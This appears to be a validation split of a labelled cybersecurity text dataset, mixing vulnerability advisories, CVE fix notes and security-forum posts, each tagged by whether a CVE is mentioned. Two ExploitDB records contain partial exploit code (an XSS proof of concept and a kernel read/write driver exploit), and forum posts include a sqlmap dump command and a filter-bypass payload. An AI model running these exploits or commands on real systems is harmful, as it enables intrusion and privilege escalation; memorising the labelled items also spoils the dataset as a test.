+{"id": "3a5454d298339bf43e5f", "text": "Improper Privilege Management in sap-xssec\n\n[Severity: CRITICAL]\n\n### Impact\n\nSAP BTP Security Services Integration Library ([Python] sap-xssec) allows under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.\n\n### Patches\nUpgrade to patched version >= 4.1.0\nWe always recommend to upgrade to the latest released version.\n\n### Workarounds\nNo workarounds\n\n### References\nhttps://www.cve.org/CVERecord?id=CVE-2023-50423\n", "source": "github_advisory", "timestamp": "2023-12-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a64a8375e865bc992065", "text": "Finally I did it. @mezzown was right. Whoever stuck with this task, read @mezzown comment attentively and revise ‘shellcode requirements’ once again.", "source": "hackthebox", "timestamp": "2023-06-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "96e25a327f99cad24c64", "text": "Online Security Guards Hiring System 1.0 - Reflected XSS\n\n#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS\n#Google Dork : NA\n#Date: 23-01-2023\n#Exploit Author : AFFAN AHMED\n#Vendor Homepage: https://phpgurukul.com\n#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip\n#Version: 1.0\n#Tested on: Windows 11 + XAMPP + PYTHON-3.X\n#CVE : CVE-2023-0527\n\n#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT\n# Below code check for both the parameter /admin-profile.php and in /search.php\n\n#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md\n\n\nimport requests\nimport re\nfrom colorama import Fore\n\nprint(Fore.YELLOW + \"######################################################################\" + Fore.RESET)\nprint(Fore.RED + \"# TITLE: Online Security Guards Hiring System v1.0\" + Fore.RESET)\nprint(Fore.RED + \"# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)\" + Fore.RESET)\nprint(Fore.RED + \"# VENDOR OF THE PRODUCT : PHPGURUKUL\" + Fore.RESET)\nprint(Fore.RED + \"# AUTHOR : AFFAN AHMED\" + Fore.RESET)\nprint(Fore.YELLOW +\"######################################################################\" + Fore.RESET)\n\nprint()\nprint(Fore.RED+\"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py\"+ Fore.RESET)\nprint()\n\n\n# NAVIGATING TO ADMIN LOGIN PAGE\nWebsite_url = \"http://localhost/osghs/admin/login.php\" # CHANGE THE URL ACCORDING TO YOUR SETUP\nprint(Fore.RED+\"----------------------------------------------------------------------\"+ Fore.RESET)\nprint(Fore.CYAN + \"[**] Inserting the Username and Password in the Admin Login Form [**]\" + Fore.RESET)\nprint(Fore.RED+\"----------------------------------------------------------------------\"+Fore.RESET)\n\nAdmin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}\n\nheaders = {\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Referer': 'http://localhost/osghs/admin/login.php',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Connection': 'close',\n 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-User': '?1',\n 'Sec-Fetch-Dest': 'document'\n}\n\nresponse = requests.request(\"POST\", Website_url, headers=headers, data = Admin_login_credentials)\nif response.status_code == 200:\n location = re.findall(r'document.location =\\'(.*?)\\'',response.text)\n if location:\n print(Fore.GREEN + \"> Login Successful into Admin Account\"+Fore.RESET)\n print(Fore.GREEN + \"> Popup:\"+ Fore.RESET,location )\n else:\n print(Fore.GREEN + \"> document.location not found\"+ Fore.RESET)\nelse:\n print(Fore.GREEN + \"> Error:\", response.status_code + Fore.RESET)\nprint(Fore.RED+\"----------------------------------------------------------------------\"+ Fore.RESET)\nprint(Fore.CYAN + \" [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]\" + Fore.RESET)\n\n\n# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE\n# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER\nWebsite_url= \"http://localhost/osghs/admin/admin-profile.php\" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE\n\n# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD\n# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=&search=\"\"\npayload = {\n \"adminname\": \"TESTAdmin\", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE\n \"username\": \"admin\", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE\n \"mobilenumber\": \"8979555558\",\n \"email\": \"admin@gmail.com\",\n \"submit\": \"", "source": "exploitdb", "timestamp": "2023-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8771a15364a6d3c2e53d", "text": "Hi I’m stuck at Control flow - loops. My for loop: for i in {1…28} do var=$(echo $var | base64 -w 0) if [[ $i -eq 28 ]] then salt=$(echo -n $var | wc -c) #also used without -n and echo ${ #var }, with same result fi done Result: *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. bad decrypt 140511816897856:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:…/crypto/evp/evp_enc.c:610: I used pwnbox. Can anyone help me please?", "source": "hackthebox", "timestamp": "2022-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5262411548c0b79b8e34", "text": "How to bruteforce dahua dvr password\n\nHow to crack Dahua DVR password, we have already used Hydra tool, Metasploit, Routersploit, and Burpsuite Pro, but nothing worked It’s pentesting scenario and we are in the same DVR network, without any IDS or IPS or firewall just simple network Any recommendations?", "source": "hackersploit", "timestamp": "2022-10-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d2f9932849d7c1b7bf7e", "text": "Coelho: ${LS_COLORS:10:1}c’a’t’${PATH:0:1}fl’a’g.txt Tried everything nothing seems to be working, can you give me some more hints", "source": "hackthebox", "timestamp": "2023-12-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "875817be766345a54c5f", "text": "Cross-site Scripting in Jenkins CRX Content Package Deployer Plugin\n\n[Severity: HIGH]\n\nJenkins CRX Content Package Deployer Plugin 1.9 and earlier does not escape the name and description of CRX Content Package Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a6df989a6374dc012141", "text": "Can someone help with Bypassing Authentication please? I tried hydra (but I can’t get around redirect) and a lot of SQL injection techniques, nothing is working UPDATE: I actually managed to do this with a popular mapping tool…", "source": "hackthebox", "timestamp": "2022-06-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8105d76038705f30497d", "text": "Hi @Lt72884 I proudly keep BackTrack 5 (Gnome and KDE) on my drive of ISOs. If you are using Metasploitable2 (Ubuntu 8.04), you may want to try Metasploitable3 (Ubuntu 14.04 or Windows Server 2008). Build using Vagrant or download Ova .", "source": "parrotsec", "timestamp": "2023-06-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "47d6f275fa1dbc1236a4", "text": "System Mechanic v15.5.0.61 - Arbitrary Read/Write\n\n/*\n# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write\n# Date: 26-09-2022\n# Exploit Author: Brandon Marshall\n# Vendor Homepage: https://www.iolo.com/\n# Tested Version - System Mechanic version 15.5.0.61\n# Driver Version - 5.4.11 - amp.sys\n# Tested on OS - 64 bit Windows 10 (18362)\n# Fixed Version - System Mechanic 17.5.0.116\n# CVE : CVE-2018-5701\n*/\n\n#include \n#include \n#include \n#include \n#pragma warning(disable:4996)\n\ntypedef struct _kernelDriverInformation {\n char* imageName;\n void* imageBase;\n\n}kernelDriverInformation, * PKernelDriverInformation;\n\ntypedef struct _functionInformation {\n char* functionName;\n void* functionOffset;\n void* functionBase;\n\n}functionInformation, * PFunctionInformation;\n\nvoid callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {\n DWORD bytesReturned;\n NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);\n}\n\nHANDLE getDeviceHandle(char* name) {\n DWORD generic_read = 0x80000000;\n DWORD generic_write = 0x40000000;\n HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);\n return handle;\n}\n\n\n\nvoid* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {\n byte* maliciousBuffer = (byte*)malloc(bufferSize);\n *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5\n *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters\n *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value\n *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown\n *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16\n *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2\n *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3\n *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4\n return (void*)maliciousBuffer;\n}\n\nvoid* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {\n byte* maliciousBuffer = (byte*)malloc(bufferSize);\n *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5\n *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters\n *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value\n *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown\n *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16\n *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2\n *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3\n *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4\n *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown\n *(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1\n return (void*)maliciousBuffer;\n}\n\nvoid* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {\n byte* maliciousBuffer = (byte*)malloc(bufferSize);\n *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5\n *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters\n *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value\n *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown\n *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLON", "source": "exploitdb", "timestamp": "2023-03-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6b79789e60aa487c85e4", "text": "OpenStack Keystone Allows Remote User Account Creation\n\n[Severity: HIGH]\n\nOpenStack Keystone, as used in OpenStack Folsom before folsom-rc1 and OpenStack Essex (2012.1), allows remote attackers to add an arbitrary user to an arbitrary tenant via a request to update the user's default tenant to the administrative API. NOTE: this identifier was originally incorrectly assigned to an open redirect issue, but the correct identifier for that issue is CVE-2012-3540.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f916286e252e1f7a2609", "text": "Debug, and debug again, what is the value of the rdx register before the xor? Sorry but I’m a bit confused. xor [rdx], rbx should not alter the value in rbx but directly write the xor-ed value back to the stack. Also, I tried directly yielding the control flow to the decoded shellcode by enabling stack execution when linking the binary with ld -z execstack . Unfortunately, the decoded shellcode contains plenty of register-based memory access, which leads to segfaults as most of the registers are initialized with value 0.", "source": "hackthebox", "timestamp": "2023-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e34bd6d36e7c5e957852", "text": "CVE: CVE-2022-2216\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url prior to 7.0.0.'}]\n\nFix commit: Refactor codebase, upgrade dependencies", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "be748b5bc462c6426537", "text": "CVE: CVE-2022-24754\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language. In versions prior to and including 2.12 PJSIP there is a stack-buffer overflow vulnerability which only impacts PJSIP users who accept hashed digest credentials (credentials with data_type `PJSIP_CRED_DATA_DIGEST`). This issue has been patched in the master branch of the PJSIP repository and will be included with the next release. Users unable to upgrade need to check that the hashed digest data length must be equal to `PJSIP_MD5STRLEN` before passing to PJSIP.'}]\n\nFix commit: Use PJ_ASSERT_RETURN() on pjsip_auth_create_digest() and pjsua_init_tpselector() (#3009)\n\n* Use PJ_ASSERT_RETURN on pjsip_auth_create_digest\r\n\r\n* Use PJ_ASSERT_RETURN on pjsua_init_tpselector()\r\n\r\n* Fix incorrect check.\r\n\r\n* Add return value to pjsip_auth_create_digest() and pjsip_auth_create_digestSHA256()\r\n\r\n* Modification based on comments.", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "962363e8ab01efd4ecc2", "text": "Hi @RyanPaulGannon I think installing into /opt is the preferred place of installing external packages. But (via apt) burpsuite by default on Parrot is installed in /usr/bin/. ┌─[anon@cracker]─[~] └──╼ $cd /usr/bin/ ┌─[anon@cracker]─[/usr/bin] └──╼ $burpsuite --version 2022.2.4-12081 Burp Suite Community Edition ┌─[anon@cracker]─[/usr/bin] └──╼ $ls -lah burpsuite -rwxr-xr-x 1 root root 504M Mar 22 12:39 burpsuite", "source": "parrotsec", "timestamp": "2022-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8c483e77fee1cbee3edf", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-3386, CVE-2016-7190, and CVE-2016-7194.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d968951aa29b790f405d", "text": "Five Important Check Points..\n\nI was researching this topic for a while. And came across several talking points. What are the five most important points to remember while developing a website? I know each point is key to a great website, but what are the five priority checkpoints? Although reducing the long list to a finite number is a crazy thing, I am curious to keep a short checklist. What are they?", "source": "go4expert", "timestamp": "2022-07-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ff47d94809b66bd03a9f", "text": "CVE: CVE-2022-2061\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository hpjansson/chafa prior to 1.12.0.'}]\n\nFix commit: libnsgif: fix oob in lzw_decode", "source": "cvefixes", "timestamp": "2022-06-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "488a987988c8fe1e9ec4", "text": "SS7 is impossible Withoud Hackrfone Hardware Device do you have this device??", "source": "hackersploit", "timestamp": "2022-08-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "02b7dfaeb18cef8c24b2", "text": "The “other user” on that system found is “g.potter”. Are we still talking about that one?", "source": "hackthebox", "timestamp": "2022-03-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e841a4f8aa8c89e1a5bf", "text": "This and other free resources for real install the OS fire up that firefox=ESR and there are all resources even more.", "source": "parrotsec", "timestamp": "2023-11-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "827cb843ffab392374bf", "text": "CVE: CVE-2022-2400\n\n[{'lang': 'en', 'value': 'External Control of File Name or Path in GitHub repository dompdf/dompdf prior to 2.0.0.'}]\n\nFix commit: Update resource URI validation and handling\n\nURI scheme (protocol) validation rules are now specified through the Options class. By default file and http(s) URIs are allowed and validation rules defined. Validation rules for PHAR URIs are defined but the scheme is not enabled by default.\n\nResource retrieval has been updated to use file_get_contents for schemes other than http(s).\n\nfixes #621\nfixes #2826\n\nin lieu of #1903", "source": "cvefixes", "timestamp": "2022-07-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2e4d43091b889db27930", "text": "In case someone is still looking for the answer… Since it’s asking us to test the cookie value, Command: sqlmap ‘url’ --cookie=‘id=1*’ --dump --batch", "source": "hackthebox", "timestamp": "2023-10-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fdfb4b7aaa2cb7fb2596", "text": "I think this one is broken, all the files in the /home/alex folder are missing and I’m unable to connect to get the Elasticity flag, maybe some more files are missing too Can anybody vote for reset to restore it?", "source": "hackthebox", "timestamp": "2022-08-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "229436f6b57ae982cdce", "text": "I agree, it's better to wait, because there are bugs, it makes less worktime productivity.", "source": "go4expert", "timestamp": "2022-01-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1f092c1b684e1fcba212", "text": "here is the solution if none of the advice did not work. Make sure to delete “salt” in the #Variables tab. We will set the salt in the loop. Variables var=“9M” hash=“VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K” Base64 Encoding Example: $ echo “Some Text” | base64 ← For-Loop here for ((i = 0 ; i < 28 ; i++)); do echo “Try number $i” var=$(echo $var | base64) echo $var | wc -c salt=$(echo $var | wc -c) done", "source": "hackthebox", "timestamp": "2023-02-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ce9dadd2c2ae6f2385ec", "text": "Gravitee API Management contains Path Traversal\n\n[Severity: HIGH]\n\n**This CVE addresses the partial fix for CVE-2019-25075**\n\nGravitee API Management before 3.15.13 allows path traversal through HTML injection. A certain HTML injection combined with path traversal in the Email service in Gravitee API Management before 3.15.13 allows anonymous users to read arbitrary files via a /management/users/register request.\n\nA patch was published in 2019 for this vulnerability but did not appear to have solved the issue. Version 3.15.13 did remove the flaw.", "source": "github_advisory", "timestamp": "2023-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "acfe6cfaec83b0765484", "text": "Kali Linux maltego | Kali Linux Tools sudo apt install maltego Maltego Support Installing Maltego Please download the appropriate Maltego installer from our website. Windows The correct operating system should be automatically detected on the web page. In the image below, Windows has been detected: From the dropdown menu, choose...", "source": "hackersploit", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2184bbe4b92141320008", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-08-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9026a6f80303b6eef6d2", "text": "CVE: CVE-2022-24829\n\n[{'lang': 'en', 'value': 'Garden is an automation platform for Kubernetes development and testing. In versions prior to 0.12.39 multiple endpoints did not require authentication. In some operating modes this allows for an attacker to gain access to the application erroneously. The configuration is leaked through the /api endpoint on the local server that is responsible for serving the Garden dashboard. At the moment, this server is accessible to 0.0.0.0 which makes it accessible to anyone on the same network (or anyone on the internet if they are on a public, static IP). This may lead to the ability to compromise credentials, secrets or environment variables. Users are advised to upgrade to version 0.12.39 as soon as possible. Users unable to upgrade should use a firewall blocking access to port 9777 from all untrusted network machines.'}]\n\nFix commit: fix(core): require auth key for server endpoints", "source": "cvefixes", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6911e684a3b7f6a84da6", "text": "Learning is the way to get greater You may find instructions on how to use MSFvenom here: How to use msfvenom · rapid7/metasploit-framework Wiki · GitHub .", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6873da200b9921062850", "text": "CVE: CVE-2022-35929\n\n[{'lang': 'en', 'value': 'cosign is a container signing and verification utility. In versions prior to 1.10.1 cosign can report a false positive if any attestation exists. `cosign verify-attestation` used with the `--type` flag will report a false positive verification when there is at least one attestation with a valid signature and there are NO attestations of the type being verified (--type defaults to \"custom\"). This can happen when signing with a standard keypair and with \"keyless\" signing with Fulcio. This vulnerability can be reproduced with the `distroless.dev/static@sha256:dd7614b5a12bc4d617b223c588b4e0c833402b8f4991fb5702ea83afad1986e2` image. This image has a `vuln` attestation but not an `spdx` attestation. However, if you run `cosign verify-attestation --type=spdx` on this image, it incorrectly succeeds. This issue has been addressed in version 1.10.1 of cosign. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-vjxv-45g9-9296\n\nToday the verification logic:\n1. Verifies signatures on attestations (at least one must verify, or it errors),\n2. All attestations matching the specified `--type` must pass any specified Cue/Rego policies,\n3. *All* signature-verified attestations are then printed.\n\nHowever, if NONE of the attestations match the specified `--type` then `2.` is considered satisfied and we proceed to `3.`\n\nThis changes the above logic to:\n1. Same.\n2. Same, but these are put into a `checked` list,\n3. `checked` must be non-empty (or an error is printed about no attestations matching `--type`),\n4. *Just* the `checked` attestations are printed.\n\n---\n\nThe bug at HEAD:\n```shell\n$ cosign verify-attestation --type spdx ghcr.io/distroless/static@sha256:dd7614b5a12bc4d617b223c588b4e0c833402b8f4991fb5702ea83afad1986e2\n\nVerification for ghcr.io/distroless/static@sha256:dd7614b5a12bc4d617b223c588b4e0c833402b8f4991fb5702ea83afad1986e2 --\nThe following checks were performed on each of these signatures:\n - The cosign claims were validated\n - Existence of the claims in the transparency log was verified offline\n - Any certificates were verified against the Fulcio roots.\nCertificate subject: https://github.com/distroless/static/.github/workflows/release.yaml@refs/heads/main\nCertificate issuer URL: https://token.actions.githubusercontent.com\nCertificate extension GitHub Workflow Trigger: schedule\nCertificate extension GitHub Workflow SHA: 7e7572e578de7c51a2f1a1791f025cf315503aa2\nCertificate extension GitHub Workflow Name: Create Release\nCertificate extension GitHub Workflow Trigger distroless/static\nCertificate extension GitHub Workflow Ref: refs/heads/main\n{\"payloadType\":\"application/vnd.in-toto+json\",\"payload\":\"eyJfdHlwZSI6Imh0dHBzOi8vaW4tdG90by5pby9TdGF0ZW1lbnQvdjAuMSIsInByZWRpY2F0ZVR5cGUiOiJjb3NpZ24uc2lnc3RvcmUuZGV2L2F0dGVzdGF0aW9uL3Z1bG4vdjEiLCJzdWJqZWN0IjpbeyJuYW1lIjoiZ2hjci5pby9kaXN0cm9sZXNzL3N0YXRpYyIsImRpZ2VzdCI6eyJzaGEyNTYiOiJkZDc2MTRiNWExMmJjNGQ2MTdiMjIzYzU4OGI0ZTBjODMzNDAyYjhmNDk5MWZiNTcwMmVhODNhZmFkMTk4NmUyIn19XSwicHJlZGljYXRlIjp7Imludm9jYXRpb24iOnsicGFyYW1ldGVycyI6bnVsbCwidXJpIjoiaHR0cHM6Ly9naXRodWIuY29tL2Rpc3Ryb2xlc3Mvc3RhdGljL2FjdGlvbnMvcnVucy8yNzc5MjEyNzA1IiwiZXZlbnRfaWQiOiIyNzc5MjEyNzA1IiwiYnVpbGRlci5pZCI6IkNyZWF0ZSBSZWxlYXNlIn0sInNjYW5uZXIiOnsidXJpIjoiaHR0cHM6Ly9naXRodWIuY29tL2FxdWFzZWN1cml0eS90cml2eSIsInZlcnNpb24iOiIwLjI5LjIiLCJkYiI6eyJ1cmkiOiIiLCJ2ZXJzaW9uIjoiIn0sInJlc3VsdCI6eyIkc2NoZW1hIjoiaHR0cHM6Ly9qc29uLnNjaGVtYXN0b3JlLm9yZy9zYXJpZi0yLjEuMC1ydG0uNS5qc29uIiwicnVucyI6W3siY29sdW1uS2luZCI6InV0ZjE2Q29kZVVuaXRzIiwib3JpZ2luYWxVcmlCYXNlSWRzIjp7IlJPT1RQQVRIIjp7InVyaSI6ImZpbGU6Ly8vIn19LCJyZXN1bHRzIjpbXSwidG9vbCI6eyJkcml2ZXIiOnsiZnVsbE5hbWUiOiJUcml2eSBWdWxuZXJhYmlsaXR5IFNjYW5uZXIiLCJpbmZvcm1hdGlvblVyaSI6Imh0dHBzOi8vZ2l0aHViLmNvbS9hcXVhc2VjdXJpdHkvdHJpdnkiLCJuYW1lIjoiVHJpdnkiLCJydWxlcyI6W10sInZlcnNpb24iOiIwLjI5LjIifX19XSwidmVyc2lvbiI6IjIuMS4wIn19LCJtZXRhZGF0YSI6eyJzY2FuU3RhcnRlZE9uIjoiMjAyMi0wOC0wMlQwMjozMzo0N1oiLCJzY2FuRmluaXNoZWRPbiI6IjIwMjItMDgtMDJUMDI6MzM6NTNaIn19fQ==\",\"signatures\":[{\"keyid\":\"\",\"sig\":\"MEYCIQCovB", "source": "cvefixes", "timestamp": "2022-08-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9b5549d33c3cb3b126b1", "text": "ReDoS based DoS vulnerability in Action Dispatch\n\n[Severity: LOW]\n\nThere is a possible regular expression based DoS vulnerability in Action Dispatch. This vulnerability has been assigned the CVE identifier CVE-2023-22792.\n\nVersions Affected: >= 3.0.0 Not affected: < 3.0.0 Fixed Versions: 5.2.8.15 (Rails LTS), 6.1.7.1, 7.0.4.1\nImpact\n\nSpecially crafted cookies, in combination with a specially crafted X_FORWARDED_HOST header can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability All users running an affected release should either upgrade or use one of the workarounds immediately.\nReleases\n\nThe FIXED releases are available at the normal locations.\nWorkarounds\n\nWe recommend that all users upgrade to one of the FIXED versions. In the meantime, users can mitigate this vulnerability by using a load balancer or other device to filter out malicious X_FORWARDED_HOST headers before they reach the application.\nPatches\n\nTo aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n 6-1-Use-string-split-instead-of-regex-for-domain-parts.patch - Patch for 6.1 series\n 7-0-Use-string-split-instead-of-regex-for-domain-parts.patch - Patch for 7.0 series\n\nPlease note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.\n\nhttps://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released", "source": "github_advisory", "timestamp": "2023-01-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e818c1ecc57145898ba9", "text": "Craft CMS XSS Vulnerability\n\n[Severity: MEDIUM]\n\nCraft CMS before 2.6.2976 allows XSS attacks because an array returned by HttpRequestService::getSegments() and getActionSegments() need not be zero-based. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-8052.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f03c05a6bc4b812365bb", "text": "Although this question is not associated with Parrot Security , you may use voicechanger.io , voicemod.net and other apps on both App and Play Store .", "source": "parrotsec", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
